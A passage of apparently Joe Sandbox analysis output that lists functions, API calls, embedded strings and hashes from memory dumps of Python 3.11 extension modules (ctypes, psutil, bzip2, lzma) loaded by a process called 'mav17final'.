                                                  • Instruction ID: f4977681498b99bad9e124ff31f977ce293d849754e50b0eadbf9aaec4613c2a
                                                  • Opcode Fuzzy Hash: 463b429a368d480f938697e6d099cec3f907049628b5d1349ecbd199c78a6655
                                                  • Instruction Fuzzy Hash: 2A4149B2E28B8698F7158B6CD9402BC37A0BB08B88F5885B5CF4C16794DF7DA545E701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: char $int $long $short $unsigned
                                                  • API String ID: 2943138195-3894466517
                                                  • Opcode ID: 01c330b6d3460536b725c75710ede4031362a47bdaf6c5878ce89829e4b6ba2f
                                                  • Instruction ID: b9e73a66295a0a1c68104a5b9e6b6d7823437072ea424affaedb013e7fced90d
                                                  • Opcode Fuzzy Hash: 01c330b6d3460536b725c75710ede4031362a47bdaf6c5878ce89829e4b6ba2f
                                                  • Instruction Fuzzy Hash: 92315876E18A5688F7228B2DC8543BC27B0BB09B88F5481B1DF0C06AA9DF3DE544E750
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocModule_State
                                                  • String ID:
                                                  • API String ID: 1903735390-0
                                                  • Opcode ID: a7a767094c4d1de27d1ae5cfedc4f2a8987a46609b88e723d83c121dba346a55
                                                  • Instruction ID: 8c02c90a3d58d396218045a86b2e477b010846db4d7c03cb25fb2e9fa593eb21
                                                  • Opcode Fuzzy Hash: a7a767094c4d1de27d1ae5cfedc4f2a8987a46609b88e723d83c121dba346a55
                                                  • Instruction Fuzzy Hash: 9821E532F0DAC385FF6A8F79985933822A4AF65B99F148035DB0E86384DF2DA544C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Arg_FormatNumber_OccurredSsize_tTupleUnpack
                                                  • String ID: byref$byref() argument must be a ctypes instance, not '%s'
                                                  • API String ID: 169608245-1446499295
                                                  • Opcode ID: 1c7a6bb527df66017d67d4d6c8e7051229e04b236d9d6aec440ba77389511a69
                                                  • Instruction ID: 1dccd19e82b89bf7f819875eec7ce89047d76e2fc829b3e890e7189f8bd56728
                                                  • Opcode Fuzzy Hash: 1c7a6bb527df66017d67d4d6c8e7051229e04b236d9d6aec440ba77389511a69
                                                  • Instruction Fuzzy Hash: 88212766A08B8682EB108F69E85027967A0FF89BF6F140635DB6D87390DF7DE504C350
                                                  APIs
                                                  • PyDict_GetItemWithError.PYTHON311(?,?,00000001,00007FF8B9F677AC), ref: 00007FF8B9F6B9AD
                                                  • PyErr_Occurred.PYTHON311(?,?,00000001,00007FF8B9F677AC), ref: 00007FF8B9F6B9BC
                                                  • PyErr_Format.PYTHON311(?,?,00000001,00007FF8B9F677AC), ref: 00007FF8B9F6B9ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Dict_ErrorFormatItemOccurredWith
                                                  • String ID: not enough arguments$required argument '%S' missing
                                                  • API String ID: 62204369-3448764933
                                                  • Opcode ID: 28da8afa7e9ef03481714140949b522f70dd2a78d8c2b5e7d138b51459312286
                                                  • Instruction ID: 15e9b5ab0632677eb4fa654150ff42268616c0bdc329b552a6f14c34d143e03b
                                                  • Opcode Fuzzy Hash: 28da8afa7e9ef03481714140949b522f70dd2a78d8c2b5e7d138b51459312286
                                                  • Instruction Fuzzy Hash: 5D110771A0EFC281EA958F6AE9841396770AF46FE7F18A531DB4E46758EF2CE441C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CharErr_FormatUnicode_Wide
                                                  • String ID: string too long (%zd, maximum length %zd)$unicode string expected instead of %s instance
                                                  • API String ID: 2195588020-2061977717
                                                  • Opcode ID: 3df54ba06c241b92dbf221aa78cdec5a2b91a3063c00f8d20a6361d5b8dc2ae5
                                                  • Instruction ID: 55801199342ebc13c32ba8a0a6b078f3934f3e2c246d570bb32950c5c23c8c37
                                                  • Opcode Fuzzy Hash: 3df54ba06c241b92dbf221aa78cdec5a2b91a3063c00f8d20a6361d5b8dc2ae5
                                                  • Instruction Fuzzy Hash: D3115422B08FC681EA808F1AE9841656B62BF89FF5F185631DF1E53BA4DE3CD455C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf
                                                  • String ID: GetActiveProcessorCount() not available; using GetSystemInfo()$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  • API String ID: 383729395-586088648
                                                  • Opcode ID: 0c310fc330f00f858f022fddad38e9cf6f8bfcfbc167ac525e5c94752c09e3f8
                                                  • Instruction ID: f0fe25ef0f68e0830ec9d893b14bf354c74d303a6bfb3baf72105cfee20fb15c
                                                  • Opcode Fuzzy Hash: 0c310fc330f00f858f022fddad38e9cf6f8bfcfbc167ac525e5c94752c09e3f8
                                                  • Instruction Fuzzy Hash: 7011DB24F0968691FE449F6DE8952B53BA1AF647E1F408436C70E073A6DE2CE587C311
                                                  APIs
                                                  Strings
                                                  • bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth, xrefs: 00007FF8B90CC768
                                                  • *** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac, xrefs: 00007FF8B90CC78A
                                                  • 1.0.8, 13-Jul-2019, xrefs: 00007FF8B90CC75B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: __acrt_iob_func$__stdio_common_vfprintfexit
                                                  • String ID: bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth$*** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac$1.0.8, 13-Jul-2019
                                                  • API String ID: 77255540-989448446
                                                  • Opcode ID: 39f94f7b81e53d96969a5455d7e6e9458db4137e20d4da26f7d9a91deb3b3694
                                                  • Instruction ID: 8c043494b1ff9618496f83f1ebee6789cde1ba9520ee647c3960bc87c745ee95
                                                  • Opcode Fuzzy Hash: 39f94f7b81e53d96969a5455d7e6e9458db4137e20d4da26f7d9a91deb3b3694
                                                  • Instruction Fuzzy Hash: F8E06D24A1859662FE185FADE8953B81375EF547C0F000939CB0E076A1DE2CE95F8352
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocEval_Thread$Bytes_FromList_RestoreSaveSizeString
                                                  • String ID:
                                                  • API String ID: 722544280-0
                                                  • Opcode ID: ea514226ac897717a144e055f78113507add513ccc51a98260a4e0d553d29f9f
                                                  • Instruction ID: da5b4fc874dd0ac4221cbe86cab4ebf7fecddf55f3db00b74af0cc498de95241
                                                  • Opcode Fuzzy Hash: ea514226ac897717a144e055f78113507add513ccc51a98260a4e0d553d29f9f
                                                  • Instruction Fuzzy Hash: 31415A32A08B8296EE649F2DA54423963B0BB58BE0F140235DF5D43BD1EF3CE49AC300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                  • String ID:
                                                  • API String ID: 3741236498-0
                                                  • Opcode ID: de3a4ec1d6e9946eef6b348e6d8a6ead344041b39e9dfd9c2ce66c677152b10d
                                                  • Instruction ID: 6f126f34958843b1520b117ca211632991ee96ca62a46273cdf62000a80fe118
                                                  • Opcode Fuzzy Hash: de3a4ec1d6e9946eef6b348e6d8a6ead344041b39e9dfd9c2ce66c677152b10d
                                                  • Instruction Fuzzy Hash: 8B31B322B19B9290FF15DF2AA9145696394FF08FD4B5986B5DF2D03784EE3DE442D300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocDict_$CallErr_FormatFromItemLong_MakeObject_Unicode_Voidstrchr
                                                  • String ID:
                                                  • API String ID: 4054517332-0
                                                  • Opcode ID: 183dbe4e66a78b5f82bf9fcbdc5b815f8fe5dd19242b5949e3bcf8ed559180f2
                                                  • Instruction ID: b0c6f64ac8d0e9461baf4af98baf7143259c753ef1a5c68d243ecf28999ee53a
                                                  • Opcode Fuzzy Hash: 183dbe4e66a78b5f82bf9fcbdc5b815f8fe5dd19242b5949e3bcf8ed559180f2
                                                  • Instruction Fuzzy Hash: 40310921A0AB8282FE549F2EE95003967A1AF4AFE6F486534DF9E47795DF3CE451C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_StringSubtypeType_
                                                  • String ID: has no _stginfo_
                                                  • API String ID: 402260271-2912685656
                                                  • Opcode ID: 9230919844186ca5f41c7b1a63fcb82edb38cf4c596bbf94e99535158fbb2ad0
                                                  • Instruction ID: bc1d6ce833dc43fe0e7ac2b68f55a8d83e6a5cf54676973e01d1c967a62a3931
                                                  • Opcode Fuzzy Hash: 9230919844186ca5f41c7b1a63fcb82edb38cf4c596bbf94e99535158fbb2ad0
                                                  • Instruction Fuzzy Hash: 16B15972A09BC682EA64CF29E85027977A5FB84BE6F14A439DB4E43754DF7CE850C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2889003569-2084237596
                                                  • Opcode ID: bc23f9d190e68b0d649da4772cf0aebac2cf99f7a7c8ea39b120ae49b64f19ea
                                                  • Instruction ID: ade5e5fcb86ee154f5f2958263cfb57ea4a2976895dbb15d6a7ab3f61892fbe2
                                                  • Opcode Fuzzy Hash: bc23f9d190e68b0d649da4772cf0aebac2cf99f7a7c8ea39b120ae49b64f19ea
                                                  • Instruction Fuzzy Hash: B5917073A08B928AE711CB69E4402ED7BA1FB44BC8F14416AEF8D17B55DF38D195DB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                  • API String ID: 2943138195-757766384
                                                  • Opcode ID: e51d893b916fd38dc1e020bc8963aa6f83aa847b46c3d095f24d6897074767ca
                                                  • Instruction ID: d48cadacfa7880ebae3d63c0199cf3d2adb9e3253aedef77145171d008f827d7
                                                  • Opcode Fuzzy Hash: e51d893b916fd38dc1e020bc8963aa6f83aa847b46c3d095f24d6897074767ca
                                                  • Instruction Fuzzy Hash: 93716676A08A4394EB148F2CD9410BC67A4BF09BC4F4445B5EF4E42BA8DF3DE660E700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2889003569-2084237596
                                                  • Opcode ID: 227e5baf7e5e9155f58c31c3fecc157e2e687fbe3eaaf077a93d355b17988fc2
                                                  • Instruction ID: 348b0d2826ea75d295b350942f276162fbf624c2ddda49361be8c50bb254f82f
                                                  • Opcode Fuzzy Hash: 227e5baf7e5e9155f58c31c3fecc157e2e687fbe3eaaf077a93d355b17988fc2
                                                  • Instruction Fuzzy Hash: E6612732A08B868AE724CF69E5803AD77A0FB44B88F144266EF4D17B99CF78E155D700
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: combined CRCs: stored = 0x%08x, computed = 0x%08x$ {0x%08x, 0x%08x}
                                                  • API String ID: 0-2474432645
                                                  • Opcode ID: 69a7ee2d0339cf96717ad35ba872c5bfcdb46555bf6c34d719e37fdf827b1516
                                                  • Instruction ID: 3e54cf4388ba3c9e2c64af98e28fb7dc8e9c3611db04f7d8366ed7189b838ecc
                                                  • Opcode Fuzzy Hash: 69a7ee2d0339cf96717ad35ba872c5bfcdb46555bf6c34d719e37fdf827b1516
                                                  • Instruction Fuzzy Hash: 2E414A32A1C6C387EF649F2994802B873B1EB44B94F144635EB1E966C5CF28E88FC710
                                                  APIs
                                                  • PyMem_Malloc.PYTHON311(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00007FF8B9F63784), ref: 00007FF8B9F624ED
                                                  • PyMem_Free.PYTHON311(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00007FF8B9F63784), ref: 00007FF8B9F625DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_$FreeMalloc
                                                  • String ID: %zd)$%zd,
                                                  • API String ID: 3308143561-2233965340
                                                  • Opcode ID: 97bbcc1d359357e3c252192984d3b0109526b27b564f2bbea6cf16545a3b7b27
                                                  • Instruction ID: a6ab5640e86abd259accb64fcaa642bcdc10b67826e497fa7a1fecc294f496e7
                                                  • Opcode Fuzzy Hash: 97bbcc1d359357e3c252192984d3b0109526b27b564f2bbea6cf16545a3b7b27
                                                  • Instruction Fuzzy Hash: C741B122A09BC281EF118F19E4502B96BA0FB59BE5F882132DF5D97795DF3DE445C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeviceQueryswprintf_s
                                                  • String ID: %c:$:$Z
                                                  • API String ID: 914998285-434247157
                                                  • Opcode ID: 5affc6d7e9673fba9a69e782a228053b50d5b8f6e27cd9141442bcbbdf8abcd8
                                                  • Instruction ID: 1db275049f1184acf5816499c6c4a9fe460b4b9b091c175fcb91a9281462ddfe
                                                  • Opcode Fuzzy Hash: 5affc6d7e9673fba9a69e782a228053b50d5b8f6e27cd9141442bcbbdf8abcd8
                                                  • Instruction Fuzzy Hash: B531E662A1D6C241EF628F28A8513FA2F60AFE17D4F844036C78E42696DE2CD50AC711
                                                  APIs
                                                  • PySequence_Size.PYTHON311(00000000,00007FF8A8D96CC8,00000000,00007FF8B909FDB0), ref: 00007FF8B909FE28
                                                  • PySequence_GetItem.PYTHON311 ref: 00007FF8B909FE5B
                                                    • Part of subcall function 00007FF8B909FEE4: PyMapping_Check.PYTHON311(?,?,?,?,?,?,?,00007FF8B909FE77), ref: 00007FF8B909FF09
                                                    • Part of subcall function 00007FF8B909FEE4: PyMapping_GetItemString.PYTHON311(?,?,?,?,?,?,?,00007FF8B909FE77), ref: 00007FF8B909FF23
                                                    • Part of subcall function 00007FF8B909FEE4: PyLong_AsUnsignedLongLong.PYTHON311(?,?,?,?,?,?,?,00007FF8B909FE77), ref: 00007FF8B909FF38
                                                    • Part of subcall function 00007FF8B909FEE4: PyErr_Occurred.PYTHON311(?,?,?,?,?,?,?,00007FF8B909FE77), ref: 00007FF8B909FF4B
                                                  • PyErr_Format.PYTHON311 ref: 00007FF8B90A5761
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072699078.00007FF8B9091000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8B9090000, based on PE: true
                                                  • Associated: 00000002.00000002.2072666393.00007FF8B9090000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072810626.00007FF8B90B4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072844987.00007FF8B90B5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9090000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_ItemLongMapping_Sequence_$CheckFormatLong_OccurredSizeStringUnsigned
                                                  • String ID: Too many filters - liblzma supports a maximum of %d
                                                  • API String ID: 1062705235-2617632755
                                                  • Opcode ID: de739252f705775659eaa313a5e663d0679b8c2fa46ad5978c51ae0de71ab62c
                                                  • Instruction ID: 570fad99c99339aebb98286e04b93dbbc570498d8cb0fc11c575d2d7e9d13bf1
                                                  • Opcode Fuzzy Hash: de739252f705775659eaa313a5e663d0679b8c2fa46ad5978c51ae0de71ab62c
                                                  • Instruction Fuzzy Hash: 5D217461A18AC2C5EE649F6EA94417A6251BF49BF4F240735DF7E067E6DE3CE8834300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$FormatInstanceObject_String
                                                  • String ID: Pointer does not support item deletion$expected %s instead of %s
                                                  • API String ID: 341772743-2046472288
                                                  • Opcode ID: 56d4fabad618d8a5c8e6f1fde8dcb41e7996936431b442245916351dcbdf5c73
